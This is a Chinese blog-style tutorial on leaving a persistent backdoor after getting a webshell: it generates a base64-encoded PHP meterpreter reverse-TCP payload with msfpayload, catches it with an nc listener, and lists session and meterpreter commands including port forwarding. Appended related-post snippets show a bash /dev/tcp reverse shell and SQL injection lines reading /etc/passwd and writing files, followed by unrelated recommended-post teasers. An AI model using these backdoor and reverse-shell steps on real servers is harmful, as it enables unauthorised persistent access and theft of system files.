1、前期--

情景就是当我们获得webshell时,我们想留下我们的后门,这个时候我们可以用到msfpayload与msfconsole结合使用

启动PostgreSQL服务:service postgresql start

启动metasploit服务:service metasploit start

启动msfconsole:msfconsole

查看数据库连接状态:db_status

生成后门文件

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT= R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php

exp.php需要加上<?php  ?>

攻击端启动监听

或者

nc 192.168.133.128 -lvp 

然后去访问我们的后门文件

2、大家想保存我们得到的session怎么办?首先必须连接数据库

exploit -h
-e <opt> The payload encoder to use. If none is specified, ENCODER is used. 有效负载编码,默认使用
-f Force the exploit to run regardless of the value of MinimumRank.
-h Help banner.
-j Run in the context of a job. 在后台中运行
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is used.
-z Do not interact with the session after successful exploitation 建立会话放到后台
sessions -h
-K Terminate all sessions 杀死所有sessions
-c <opt> Run a command on the session given with -i, or all 执行一个命令
-d <opt> Detach an interactive session
-h Help banner
-i <opt> Interact with the supplied session ID 连接会话
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: )
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List verbose fields

3、meterpreter使用

Core Commands 代码命令
============= Command Description
------- -----------
? Help menu 查看帮助
background Backgrounds the current session 将sessions保存到后台
bgkill Kills a background meterpreter script 杀死后台meterpreter脚本
bglist Lists running background scripts 列出后台meterpreter脚本
bgrun Executes a meterpreter script as a background thread 在后台进程中执行一个脚本
channel Displays information about active channels 显示活动的通道
close Closes a channel 关闭通道
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session 退出
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode 开启ruby终端
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel Stdapi: File system Commands 文件命令
============================ Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory Stdapi: Networking Commands 网络命令
=========================== Command Description
------- -----------
portfwd Forward a local port to a remote service 端口转发
   portfwd  add -l 5555 -p 3389 -r 192.168.198.129 将192.168.198.129的3389端口转发到本地的5555端口 Stdapi: System Commands
======================= Command Description
------- -----------
execute Execute a command 执行命令
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
shell Drop into a system command shell 生成一个shell
sysinfo Gets information about the remote system, such as OS 查看系统信息

附上:初探meterpreter

msfpayload反弹shell的更多相关文章

  1. 内网渗透中的反弹Shell与端口转发

    from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload ...

  2. Linux下反弹shell的种种方式

    [前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/ >& 这里s ...

  3. NC / Netcat - 反弹Shell

    原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>n ...

  4. 小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

    SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' unio ...

  5. linux反弹shell

    参考链接 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-s ...

  6. python shell与反弹shell

    python shell与反弹shell 正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接 反弹shell,攻击端是服务端,被攻击端是客户端正常shell,攻击端是客户端, ...

  7. linux下反弹shell

    01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10      192.168.43.151       监听端    装有nc kali        ...

  8. golang写的反弹shell(自作孽不可活,切记,切记!)

    仅作安全研究 package main import ( "os/exec" "go-pop3" "log" "strings&q ...

  9. 使用DnsCat反弹shell

    DnsCat技术特点 Dns隧道反弹shell DnsCat服务器的安装 #git clone https://github.com/iagox86/dnscat2.git #cd dnscat2 # ...

随机推荐

  1. HDU4734——2013 ACM/ICPC Asia Regional Chengdu Online

    今天做的比赛,和队友都有轻微被虐的赶脚. 诶,我做的题就是这个题目了. 题目描述就是对于一个十进制数数位上的每一位当做一个二进制位来求出这个数,这个定义为G(x). 题目给定你A和B,求在0-B范围内 ...

  2. hibernate关联关系

    hibernate是一个强大的ORM框架,为了使用面向对象的方式管理数据库,hibernate提供了4中关系设置: 1.一对一 (one-to-one) 2.一对多 (one-to-many) 3.多 ...

  3. Error:Artifact 'xx.war exploded' has invalid extension

    环境信息:  IDEA 13 ,  MAVEN, JBOSS 7. 配置信息: 常规配置. 出错信息: Error:Artifact 'xx.war exploded' has invalid ext ...

  4. RocketMQ生产者消息篇

    系列文章 RocketMQ入门篇 RocketMQ生产者流程篇 RocketMQ生产者消息篇 前言 上文RocketMQ生产者流程篇中详细介绍了生产者发送消息的流程,本文将重点介绍发送消息的通信模式以 ...

  5. attention、self-attention、transformer和bert模型基本原理简述笔记

    attention 以google神经机器翻译(NMT)为例 无attention: encoder-decoder在无attention机制时,由encoder将输入序列转化为最后一层输出state ...

  6. 【CF472G】Design Tutorial: Increase the Constraints

    Description 给出两个01序列\(A\)和\(B\) 要求回答\(q\)个询问每次询问\(A\)和\(B\)中两个长度为\(len\)的子串的哈明距离 ​ 哈明距离的值即有多少个位置不相等 ...

  7. 毕业设计预习:maxplus2入门教程

    maxplus2入门教程 一.安装配置(maxplus2.zip) 下载安装完成后,运行maxstart.exe,显示如下错误提示: 为节省配置工作,在E:盘下新建maxplus2文件夹,仅将所需附加 ...

  8. UVA.12169 Disgruntled Judge ( 拓展欧几里得 )

    UVA.12169 Disgruntled Judge ( 拓展欧几里得 ) 题意分析 给出T个数字,x1,x3--x2T-1.并且我们知道这x1,x2,x3,x4--x2T之间满足xi = (a * ...

  9. 遇到问题---java---安装新版本jdk后Failed reading value of registry key

    情况 情况是原本安装有jdk1.7,能正常运行,现在要升级到1.8. 直接在oracle的网站下载1.8安装后修改配置为1.8后: 能用javac编译成功,但java命令运行时报错: Failed r ...

  10. Java考试题之七

    QUESTION 150 Click the Exhibit button. Given: ClassA a = new ClassA(); a.methodA(); What is the resu ...